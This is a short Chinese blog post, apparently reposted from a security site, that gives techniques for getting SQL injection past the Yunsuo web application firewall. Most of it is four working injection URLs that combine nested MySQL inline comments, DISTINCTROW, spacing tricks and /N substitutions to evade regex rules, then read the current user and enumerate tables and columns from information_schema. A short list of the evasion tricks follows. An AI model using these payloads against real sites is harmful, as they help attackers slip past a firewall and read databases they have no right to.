过云锁注入技巧

颓废 2019年5月19日08:34:01评论661 views字数 774阅读2分34秒阅读模式
摘要

win03 + apache + php + 云锁最新版win_3.1.6 第一种方法就不多说了,网上很早就出来了,检测post后忽略get,从而被绕过。
这里主要介绍下如何绕过正则。
先贴payload:

过云锁注入技巧

环境

win03 + apache + php + 云锁最新版win_3.1.6

绕过

第一种方法就不多说了,网上很早就出来了,检测post后忽略get,从而被绕过。
这里主要介绍下如何绕过正则。
先贴payload:

https://www.0dayhack.com/test.php?id=2%27/*!40000/*!30000union*/DISTINCTROW select 1,2,3– -
https://www.0dayhack.com/test.php?id=2%27/*!40000/*!30000union*/DISTINCTROW select 1,user (),3– -
https://www.0dayhack.com/test.php?id=2%27/*!40000/*!30000union*/DISTINCTROW select/N,table_name,/Nfrom information_schema.tables where table_schema='blog' limit 1 offset 1– -
https://www.0dayhack.com/test.php?id=2%27/*!40000/*!30000union*/DISTINCTROW select/N,column_name,/Nfrom information_schema.columns where table_name='users' limit 1 offset 1– -

技巧

1. 多重内联(/*!*/)+额外关键字(DISTINCTROW)

union select => /*!40000/*!30000union*/DISTINCTROW select

2. 函数和括号间增加空白符

user() => user ()

3.

select 1,table_name,3 => select/N,table_name,/Nfrom

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
颓废
  • 本文由 发表于 2019年5月19日08:34:01
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   过云锁注入技巧http://cn-sec.com/archives/67622.html

发表评论

匿名网友 填写信息